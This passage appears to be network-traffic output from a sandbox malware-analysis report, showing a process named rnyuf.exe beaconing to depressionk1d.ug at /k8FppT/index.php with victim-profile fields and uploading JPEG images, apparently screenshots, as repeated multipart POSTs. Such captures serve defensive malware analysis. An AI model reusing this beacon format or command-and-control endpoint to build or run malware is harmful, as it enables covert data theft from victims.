                          Nov 12, 2021 22:23:11.928633928 CET1594OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:11.928689957 CET1600OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:11.929594994 CET1602OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:11.929625988 CET1608OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:11.929673910 CET1614OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:11.929692030 CET1617OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:11.951384068 CET1620OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:13.000835896 CET1688INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:12 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          90192.168.2.449874178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:39.063790083 CET5697OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:39.095176935 CET5698INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:39 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          91192.168.2.449875178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:39.229237080 CET5698OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:39.256118059 CET5699INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:39 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          92192.168.2.449876178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:39.282223940 CET5699OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----2379f4103dba772a786c03df93bf021f
                          Host: depressionk1d.ug
                          Content-Length: 111558
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:39.282376051 CET5700OUTData Raw: 2d 2d 2d 2d 2d 2d 32 33 37 39 66 34 31 30 33 64 62 61 37 37 32 61 37 38 36 63 30 33 64 66 39 33 62 66 30 32 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------2379f4103dba772a786c03df93bf021fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:39.282567978 CET5710OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:39.282690048 CET5712OUTData Raw: 45 14 50 20 a2 8a 28 00 a2 8a 28 00 a2 8a 5e 68 00 e6 8a 39 a2 98 05 14 51 40 82 8a 05 06 80 0a e9 be 1e ff 00 c8 fd a3 ff 00 d7 63 ff 00 a0 9a e6 6b a6 f8 7b ff 00 23 f6 8f ff 00 5d 8f fe 82 6a 27 f0 b2 a1 f1 23 e9 6a 28 aa cd 6b 33 3b 30 bf b8
                          Data Ascii: EP ((^h9Q@ck{#]j'#j(k3;0PNBET$c($c(SFFtUOOA?"FtUOOA?"OA?"d7?Ed7?
                          Nov 12, 2021 22:23:39.304872036 CET5715OUTData Raw: 59 46 94 c7 b4 0c 67 23 83 9c fa 8c 71 9a e7 0b d7 6e 1e 75 f8 40 5b cb 53 34 f3 f9 6a 73 f3 1b 58 e4 dc 4e 3d 04 af 8f c6 b8 0d f5 a4 e0 95 ad d8 e2 c2 e2 25 3e 7e 67 7b 49 a4 4c 5e b0 35 93 9b e5 ff 00 ae 63 f9 9a d8 df 58 ba a9 cd e2 ff 00 d7
                          Data Ascii: YFg#qnu@[S4jsXN=%>~g{IL^5cX1ve,k?:(>p:IEjYNe|::n}ko5?#q-]j/O>bhJ|kW|_A~-
                          Nov 12, 2021 22:23:39.304907084 CET5718OUTData Raw: 21 3a 4e ea df 8d d9 ec 61 15 58 d0 6a aa b3 bf e1 64 79 cd 2d 1c d1 cd 49 a0 94 51 45 00 7a 4f c1 4f f9 1d a2 fc 7f f4 5c 95 ef 7e 20 1a a3 41 02 e9 b1 3c 8a 5c f9 eb 14 ab 13 95 c1 c6 18 f4 19 c6 48 e7 1d 2b c1 3e 0a 7f c8 ed 17 e3 ff 00 a2 e4
                          Data Ascii: !:NaXjdy-IQEzOO\~ A<\H+><Ew=5kg=k*^UHTuTtvs <?iV9odc$c'qn</4R4G9bv\QD$fghn8e8HFs)":y=HhFLQ67
                          Nov 12, 2021 22:23:39.305159092 CET5726OUTData Raw: f4 3d 53 c3 b7 16 56 5b c9 90 a9 62 ec 99 c0 20 e0 05 27 27 20 57 81 55 86 b2 bb 59 27 8d ad 27 0f 6e bb e6 53 19 cc 4b 90 32 c3 1c 0c 91 c9 f5 15 14 90 cb 10 8c cb 13 a0 95 37 c6 59 48 de b9 23 23 d4 64 11 9f 63 5b 51 a2 a9 b6 ef 76 ff 00 af f3
                          Data Ascii: =SV[b '' WUY''nSK27YH##dc[Qv0b#N0n]!sIK]sES(EP(%/4Q@%%EPZ8VVYc[;h$NsZ[G7Xtm20;>{W!vWvL+#7L
                          Nov 12, 2021 22:23:39.305198908 CET5729OUTData Raw: 58 e2 3e 03 7a 0f df 3d 7e 92 b8 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 59 ba 10 86 95 25 67 e4 af 6f 5d 50 d5 79 cf 5a 71 ba f3 76 bf a6 8c b7
                          Data Ascii: X>z=~x%n#rN.HI?ZxlMHnOY%go]PyZqvZ4#m2A|]FlV2Hm9AWF^:WWnP^W^J(_9.*h<i6EFNF@]o)Zw?k9~?S_Fx
                          Nov 12, 2021 22:23:39.305233002 CET5733OUTData Raw: f1 ef 89 ad 62 11 c7 aa 3b 28 e9 e6 22 b9 fc c8 26 ab df f8 c3 c4 1a 94 6d 1d ce a7 31 46 18 2a 98 40 7f ef 9c 57 9d 7f c2 4b 79 ff 00 3c a0 ff 00 be 4f f8 d3 7f e1 26 bd ff 00 9e 56 ff 00 f7 c9 ff 00 1a ef 55 b0 69 f3 28 ab fa 1e 7b a1 8c 6b 95
                          Data Ascii: b;("&m1F*@WKy<O&VUi({kk;[o|*Dws:SXTR{"Q^IQ@C];08I5cWM[%k$J.TtRQJ15=
                          Nov 12, 2021 22:23:39.305998087 CET5738OUTData Raw: 94 f6 ab 86 3a 61 4a cd c0 d1 4c a4 d1 d4 6d 1d 5e 64 a8 8c 75 93 a6 69 1a 85 12 94 c6 4a ba 63 a8 9a 3a cd c0 da 35 0a 65 69 84 55 96 5a 8c ad 63 28 9a a9 10 91 49 8a 94 ad 30 8a 86 8b 4c 65 18 a5 c5 18 a9 b1 43 71 4a 05 18 a5 a2 c0 21 a6 f7 a7
                          Data Ascii: :aJLm^duiJc:5eiUZc(I0LeCqJ!blN;^]yO7%!d`IFJ:;##qz{{TM$}eV2N=/5(:M6CR]:EZn@6ch/:!d}"
                          Nov 12, 2021 22:23:39.327982903 CET5744OUTData Raw: 21 30 46 7f 86 90 da af 62 45 4f 8a 5c 52 e4 41 ed 19 58 da 1e cc 29 86 d9 c7 6c d5 ec 52 81 47 b2 41 ed 59 9f e5 b0 ea a6 8e 7d 2b 4b 14 6c 53 d5 01 a3 d9 76 0f 6a 67 52 8a be 6d e3 3f c2 45 34 da 2f 63 47 b3 61 ed 62 54 03 34 ec 54 e6 d1 bb 11
                          Data Ascii: !0FbEO\RAX)lRGAY}+KlSvjgRm?E4/cGabT4TH`{fV>tJ;iARP)LRMUXWZ)qLBSMRP)SbaF)RP:4(\3Fhf4V%5iAryISTCPK`5<=VOTKd=<5TOH)4
                          Nov 12, 2021 22:23:39.377806902 CET5815INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:39 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          93192.168.2.449877178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:39.384613991 CET5815OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:39.412955046 CET5816INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:39 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          94192.168.2.449878178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:39.540863037 CET5817OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:39.565828085 CET5817INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:39 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          95192.168.2.449879178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:39.701807976 CET5818OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:39.727602005 CET5818INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:39 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          96192.168.2.449881178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:39.858352900 CET5828OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:39.858475924 CET5828OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:39.858669043 CET5838OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:39.859452963 CET5841OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:39.880981922 CET5844OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:39.881079912 CET5847OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:39.881117105 CET5850OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:39.881145954 CET5852OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:39.881175041 CET5858OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:39.881206036 CET5862OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:39.882378101 CET5867OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:39.958003998 CET5939INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:39 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:40.001981020 CET5939OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:40.027946949 CET5940INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:40 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          97192.168.2.449882178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:39.870584011 CET5841OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:39.896327972 CET5868INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:39 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          98192.168.2.449883178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
